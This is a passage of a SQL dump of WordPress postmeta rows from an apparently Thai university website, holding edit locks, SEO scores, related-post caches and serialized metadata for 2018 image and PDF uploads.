:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8600, 3885, '_thumbnail_id', '3886'),
(8604, 3885, '_hide_featured', NULL),
(8605, 3885, '_yoast_wpseo_content_score', '30'),
(8606, 3885, '_yoast_wpseo_primary_category', '31'),
(8607, 3885, '_wpas_done_all', '1'),
(8608, 3888, '_thumbnail_id', '3853'),
(8609, 3888, '_yoast_wpseo_primary_category', '4'),
(8610, 3888, '_edit_lock', '1535954438:3'),
(8611, 3888, '_edit_last', '3'),
(8615, 3888, '_hide_featured', NULL),
(8616, 3888, '_yoast_wpseo_content_score', '30'),
(8617, 3888, '_wpas_done_all', '1'),
(8618, 3890, '_wp_attached_file', '2018/09/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2560-1.pdf'),
(8619, 2871, '_yoast_wpseo_content_score', '60'),
(8620, 3882, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575740012;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6141;}i:1;a:1:{s:2:\"id\";i:6071;}i:2;a:1:{s:2:\"id\";i:6152;}}}}'),
(8621, 3878, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575436413;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4961;}i:1;a:1:{s:2:\"id\";i:4735;}i:2;a:1:{s:2:\"id\";i:4887;}}}}'),
(8622, 3885, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575132116;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4098;}i:1;a:1:{s:2:\"id\";i:3968;}i:2;a:1:{s:2:\"id\";i:6158;}}}}'),
(8623, 3893, '_edit_lock', '1536036169:3'),
(8624, 3893, '_edit_last', '3'),
(8625, 3894, '_wp_attached_file', '2018/09/40684790_672774869765371_4404639285903360_o.jpg'),
(8626, 3894, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:55:\"2018/09/40684790_672774869765371_4404639285903360_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:55:\"40684790_672774869765371_4404639285903360_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:55:\"40684790_672774869765371_4404639285903360_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:55:\"40684790_672774869765371_4404639285903360_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:56:\"40684790_672774869765371_4404639285903360_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:55:\"40684790_672774869765371_4404639285903360_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8627, 3893, '_thumbnail_id', '3894'),
(8631, 3893, '_hide_featured', NULL),
(8632, 3893, '_yoast_wpseo_content_score', '30'),
(8633, 3893, '_yoast_wpseo_primary_category', '31'),
(8634, 3893, '_wpas_done_all', '1'),
(8635, 3893, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574626990;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4869;}i:1;a:1:{s:2:\"id\";i:4739;}i:2;a:1:{s:2:\"id\";i:4701;}}}}'),
(8636, 3896, '_edit_lock', '1536044394:3'),
(8637, 3896, '_edit_last', '3'),
(8638, 3897, '_wp_attached_file', '2018/09/ประกาศ.pdf'),
(8642, 3896, '_hide_featured', NULL),
(8643, 3896, '_yoast_wpseo_content_score', '60'),
(8644, 3896, '_yoast_wpseo_primary_category', '3'),
(8645, 3896, '_wpas_done_all', '1'),
(8646, 3896, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575735672;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5469;}i:1;a:1:{s:2:\"id\";i:4093;}i:2;a:1:{s:2:\"id\";i:4020;}}}}'),
(8647, 3888, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575670407;s:7:\"payload\";a:0:{}}}'),
(8648, 3626, '_yoast_wpseo_content_score', '30'),
(8649, 3904, '_edit_lock', '1536559904:3'),
(8650, 3904, '_edit_last', '3'),
(8657, 3904, '_hide_featured', NULL),
(8658, 3904, '_yoast_wpseo_content_score', '30'),
(8659, 3904, '_yoast_wpseo_primary_category', '31'),
(8660, 3904, '_wpas_done_all', '1'),
(8661, 3907, '_wp_attached_file', '2018/09/41061135_674229656286559_6379855334713851904_o.jpg'),
(8662, 3907, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/09/41061135_674229656286559_6379855334713851904_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41061135_674229656286559_6379855334713851904_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41061135_674229656286559_6379855334713851904_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41061135_674229656286559_6379855334713851904_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41061135_674229656286559_6379855334713851904_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41061135_674229656286559_6379855334713851904_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8663, 3904, '_thumbnail_id', '3907'),
(8666, 3908, '_edit_lock', '1536560030:3'),
(8667, 3908, '_edit_last', '3'),
(8668, 3909, '_wp_attached_file', '2018/09/41195616_674342659608592_3291528322789408768_o.jpg'),
(8669, 3909, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1476;s:6:\"height\";i:1110;s:4:\"file\";s:58:\"2018/09/41195616_674342659608592_3291528322789408768_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41195616_674342659608592_3291528322789408768_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41195616_674342659608592_3291528322789408768_o-300x226.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41195616_674342659608592_3291528322789408768_o-768x578.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41195616_674342659608592_3291528322789408768_o-1024x770.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:770;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41195616_674342659608592_3291528322789408768_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8670, 3908, '_thumbnail_id', '3909'),
(8674, 3908, '_hide_featured', NULL),
(8675, 3908, '_yoast_wpseo_content_score', '30'),
(8676, 3908, '_yoast_wpseo_primary_category', '31'),
(8677, 3908, '_wpas_done_all', '1'),
(8678, 3911, '_edit_lock', '1536560528:3'),
(8679, 3911, '_edit_last', '3'),
(8683, 3911, '_hide_featured', NULL),
(8684, 3911, '_yoast_wpseo_content_score', '30'),
(8685, 3911, '_yoast_wpseo_primary_category', '31'),
(8686, 3911, '_wpas_done_all', '1'),
(8687, 3913, '_wp_attached_file', '2018/09/41129150_674347142941477_1177415505527439360_o.jpg'),
(8688, 3913, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/09/41129150_674347142941477_1177415505527439360_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41129150_674347142941477_1177415505527439360_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41129150_674347142941477_1177415505527439360_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41129150_674347142941477_1177415505527439360_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41129150_674347142941477_1177415505527439360_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41129150_674347142941477_1177415505527439360_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8689, 3911, '_thumbnail_id', '3913'),
(8692, 3914, '_edit_lock', '1536562117:3'),
(8693, 3914, '_edit_last', '3'),
(8694, 3915, '_wp_attached_file', '2018/09/41448788_675840636125461_7365180772979834880_o.jpg'),
(8695, 3915, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/09/41448788_675840636125461_7365180772979834880_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41448788_675840636125461_7365180772979834880_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41448788_675840636125461_7365180772979834880_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41448788_675840636125461_7365180772979834880_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41448788_675840636125461_7365180772979834880_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41448788_675840636125461_7365180772979834880_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8696, 3914, '_thumbnail_id', '3915'),
(8700, 3914, '_hide_featured', NULL),
(8701, 3914, '_yoast_wpseo_content_score', '30'),
(8702, 3914, '_yoast_wpseo_primary_category', '31'),
(8703, 3914, '_wpas_done_all', '1'),
(8704, 3917, '_edit_lock', '1536564452:3'),
(8705, 3917, '_edit_last', '3'),
(8706, 3918, '_wp_attached_file', '2018/09/41394299_675860699456788_4022449653973778432_n.jpg'),
(8707, 3918, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:719;s:4:\"file\";s:58:\"2018/09/41394299_675860699456788_4022449653973778432_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41394299_675860699456788_4022449653973778432_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41394299_675860699456788_4022449653973778432_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41394299_675860699456788_4022449653973778432_n-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41394299_675860699456788_4022449653973778432_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8708, 3917, '_thumbnail_id', '3918'),
(8712, 3917, '_hide_featured', NULL),
(8713, 3917, '_yoast_wpseo_content_score', '30'),
(8714, 3917, '_yoast_wpseo_primary_category', '31'),
(8715, 3917, '_wpas_done_all', '1'),
(8716, 3911, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575678109;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4955;}i:1;a:1:{s:2:\"id\";i:5920;}i:2;a:1:{s:2:\"id\";i:4958;}}}}'),
(8717, 3914, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575479109;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6156;}i:1;a:1:{s:2:\"id\";i:4967;}i:2;a:1:{s:2:\"id\";i:6158;}}}}'),
(8718, 3917, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575552864;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5900;}i:1;a:1:{s:2:\"id\";i:5159;}i:2;a:1:{s:2:\"id\";i:4199;}}}}'),
(8719, 3904, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575560333;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5038;}i:1;a:1:{s:2:\"id\";i:5141;}i:2;a:1:{s:2:\"id\";i:5162;}}}}'),
(8720, 3908, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575607469;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4029;}i:1;a:1:{s:2:\"id\";i:4934;}i:2;a:1:{s:2:\"id\";i:5939;}}}}'),
(8721, 3922, '_edit_lock', '1536641997:3'),
(8722, 3922, '_edit_last', '3'),
(8723, 3923, '_wp_attached_file', '2018/09/ประกาศป.ตรี.pdf'),
(8727, 3922, '_hide_featured', NULL),
(8728, 3922, '_yoast_wpseo_content_score', '60'),
(8729, 3922, '_yoast_wpseo_primary_category', '3'),
(8730, 3922, '_wpas_done_all', '1'),
(8731, 3925, '_edit_lock', '1536642412:3'),
(8732, 3925, '_edit_last', '3'),
(8733, 3926, '_wp_attached_file', '2018/09/41512414_676262956083229_1134271403692916736_o.jpg'),
(8734, 3926, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:720;s:4:\"file\";s:58:\"2018/09/41512414_676262956083229_1134271403692916736_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41512414_676262956083229_1134271403692916736_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41512414_676262956083229_1134271403692916736_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41512414_676262956083229_1134271403692916736_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41512414_676262956083229_1134271403692916736_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41512414_676262956083229_1134271403692916736_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8735, 3925, '_thumbnail_id', '3926'),
(8739, 3925, '_hide_featured', NULL),
(8740, 3925, '_yoast_wpseo_content_score', '30'),
(8741, 3925, '_yoast_wpseo_primary_category', '31'),
(8742, 3925, '_wpas_done_all', '1'),
(8743, 3922, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575063505;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6054;}i:1;a:1:{s:2:\"id\";i:5169;}i:2;a:1:{s:2:\"id\";i:5194;}}}}'),
(8744, 3925, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575703045;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4964;}i:1;a:1:{s:2:\"id\";i:4934;}i:2;a:1:{s:2:\"id\";i:4718;}}}}'),
(8747, 3932, '_wp_attached_file', '2018/09/14-3-2561-9-15-49.jpg'),
(8748, 3932, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:240;s:4:\"file\";s:29:\"2018/09/14-3-2561-9-15-49.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-15-49-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8749, 3933, '_wp_attached_file', '2018/09/18-9-2561-9-23-35.jpg'),
(8750, 3933, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:580;s:6:\"height\";i:152;s:4:\"file\";s:29:\"2018/09/18-9-2561-9-23-35.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"18-9-2561-9-23-35-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"18-9-2561-9-23-35-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"18-9-2561-9-23-35-400x105.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:105;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8751, 3934, '_wp_attached_file', '2018/09/18-9-2561-9-43-33.jpg'),
(8752, 3934, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:240;s:4:\"file\";s:29:\"2018/09/18-9-2561-9-43-33.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"18-9-2561-9-43-33-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8753, 1451, '_yoast_wpseo_content_score', '30'),
(8754, 3936, '_wp_attached_file', '2018/09/18-9-2561-9-59-38.jpg'),
(8755, 3936, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:774;s:6:\"height\";i:572;s:4:\"file\";s:29:\"2018/09/18-9-2561-9-59-38.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"18-9-2561-9-59-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"18-9-2561-9-59-38-300x222.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"18-9-2561-9-59-38-768x568.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:568;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"18-9-2561-9-59-38-400x296.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8756, 982, '_yoast_wpseo_content_score', '30'),
(8757, 3939, '_wp_attached_file', '2018/01/ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง.jpg'),
(8758, 3939, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:220;s:6:\"height\";i:264;s:4:\"file\";s:98:\"2018/01/ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:98:\"ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8761, 643, '_yoast_wpseo_content_score', '90'),
(8762, 643, '_yoast_wpseo_primary_category', ''),
(8763, 926, '_yoast_wpseo_primary_category', ''),
(8764, 2914, '_wp_attachment_backup_sizes', 'a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:359;s:6:\"height\";i:531;s:4:\"file\";s:37:\"-อ่อนส้มกฤษ-1.jpg\";}s:18:\"full-1537239819546\";a:3:{s:5:\"width\";i:300;s:6:\"height\";i:444;s:4:\"file\";s:52:\"-อ่อนส้มกฤษ-1-e1537239796531.jpg\";}s:18:\"full-1537240335648\";a:3:{s:5:\"width\";i:300;s:6:\"height\";i:444;s:4:\"file\";s:52:\"-อ่อนส้มกฤษ-1-e1537239819546.jpg\";}s:18:\"full-1537240439493\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:296;s:4:\"file\";s:52:\"-อ่อนส้มกฤษ-1-e1537240335648.jpg\";}}'),
(8767, 647, '_yoast_wpseo_primary_category', ''),
(8768, 920, '_yoast_wpseo_primary_category', ''),
(8769, 647, '_yoast_wpseo_content_score', '90'),
(8775, 649, '_yoast_wpseo_content_score', '60'),
